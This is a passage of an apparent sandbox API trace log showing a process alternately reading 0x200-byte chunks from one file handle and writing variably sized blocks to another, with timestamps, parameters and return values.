| out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.038] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.038] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.039] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.039] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.040] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.040] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.041] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.041] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.042] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.042] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.043] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.043] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.044] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.044] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.045] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.045] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.046] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.046] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.047] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.047] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.048] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.048] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.049] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.049] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.050] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.050] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.051] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.051] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.051] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.052] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.052] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.053] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.053] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.054] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.054] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.055] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.055] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.056] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.056] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.057] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.057] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.058] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.058] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.058] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.059] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.059] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.060] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.060] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.061] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.061] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.062] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.062] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.063] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.063] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.064] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.064] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.065] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.065] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.066] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.067] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.067] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.068] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.068] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.069] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.069] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.070] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.070] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.071] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.071] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.072] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.072] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.073] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x386, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.073] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.074] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.075] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.075] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.075] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.076] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.076] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.077] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.077] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.078] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.078] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.079] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.079] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.080] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.080] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.081] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.081] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.082] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.082] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.083] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.083] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.083] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.084] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.084] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.085] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.085] WriteFile 